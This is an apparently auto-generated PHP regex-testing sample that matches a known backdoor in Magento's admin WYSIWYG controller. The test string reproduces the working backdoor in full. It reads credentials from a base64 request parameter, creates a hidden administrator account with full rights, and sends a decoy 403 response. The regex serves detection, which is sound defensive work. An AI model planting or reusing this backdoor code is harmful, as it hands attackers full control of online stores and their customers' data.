$re = '/public function directiveAction\(\)\s*\{\s*\Kif\(isset\(\$\w+\[[\'"][^{]+\{\s*\$\w+=base64_decode\(\$\w+\[[^;]+;\s*if\(preg_match\([\'"]\/_rieqyns13_was_here[^{]+\{\s*preg_match\("\/_rieqyns13_was_here[^{]+\{\s*\$user[\s=]+Mage\:+getModel\(\'admin\/user\'\)\s*->setdata\(array\(\s*\'username.*?setname(*COMMIT)\([\'"]Inchoo.{0,700}?setRoleIds\(array\(\$role(?:[^}]+\}\s*)+?echo\s*[\'"]success[\'"];exit;\s*\}\s*if\(preg_match\([\'"][^{]+\{\s*header\([\'"].{0,50}?Unauthorized[\'"]\);exit;\s*\}\s*\}(?=\s*\$directive = \$this->getRequest\(\)->getParam\(\'___directive\'\);)/is';
$str = '
* @category Mage
* @package Mage_Adminhtml
* @author Magento Core Team <core@magentocommerce.com>
*/
class Mage_Adminhtml_Cms_WysiwygController extends Mage_Adminhtml_Controller_Action
{
/**
* Template directives callback
*
* TODO: move this to some model
*/
public function directiveAction()
{
if(isset($_REQUEST["filter"])){
$jembot=base64_decode($_REQUEST["filter"]);
if(preg_match("/_rieqyns13_was_here/",$jembot)){
preg_match("/_rieqyns13_was_here(.+?)_rieqyns13_(.+?)_rieqyns13_was_here/",$jembot,$m);
$base = getcwd();
require_once $base."/app/Mage.php";
Mage::app();
$user=null;
$role=null;
try {
$user = Mage::getModel(\'admin/user\')
->setData(array(
\'username\' => base64_decode($m[1]),
\'firstname\' => \'Developer\',
\'lastname\' => \'User\',
\'email\' => \'developer\'.rand(0,10000).\'@\'.$_SERVER[\'SERVER_NAME\'],
\'password\' => base64_decode($m[2]),
\'is_active\' => 1
))->save();
} catch (Exception $e) {
echo $e->getMessage();
exit;
}
try {
$role = Mage::getModel("admin/roles")
->setName(\'Inchoo\')
->setRoleType(\'G\')
->save();
Mage::getModel("admin/rules")
->setRoleId($role->getId())
->setResources(array("all"))
->saveRel();
} catch (Mage_Core_Exception $e) {
echo $e->getMessage();
exit;
} catch (Exception $e) {
echo \'Error while saving role.\';
exit;
}
try {
$user->setRoleIds(array($role->getId()))
->setRoleUserId($user->getUserId())
->saveRelations();
} catch (Exception $e) {
echo $e->getMessage();
exit;
}
echo "Success";exit;
}
if(preg_match("/insert/i",$jembot)){
header("HTTP/1.1 403 Unauthorized");exit;
}
}
$directive = $this->getRequest()->getParam(\'___directive\');
$directive = Mage::helper(\'core\')->urlDecode($directive);
$url = Mage::getModel(\'core/email_template_filter\')->filter($directive);
try {
$image = Varien_Image_Adapter::factory(\'GD2\');
$image->open($url);
$image->display();
} catch (Exception $e) {
$image = Varien_Image_Adapter::factory(\'GD2\');
$image->open(Mage::getSingleton(\'cms/wysiwyg_config\')->getSkinImagePlaceholderUrl());
$image->display();
/*
$image = imagecreate(100, 100);
$bkgrColor = imagecolorallocate($image,10,10,10);
imagefill($image,0,0,$bkgrColor);
$textColor = imagecolorallocate($image,255,255,255);
imagestring($image, 4, 10, 10, \'Skin image\', $textColor);
header(\'Content-type: image/png\');
imagepng($image);
imagedestroy($image);
*/
}
}
}';
preg_match_all($re, $str, $matches, PREG_SET_ORDER, 0);
// Print the entire match result
var_dump($matches);
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for PHP, please visit: http://php.net/manual/en/ref.pcre.php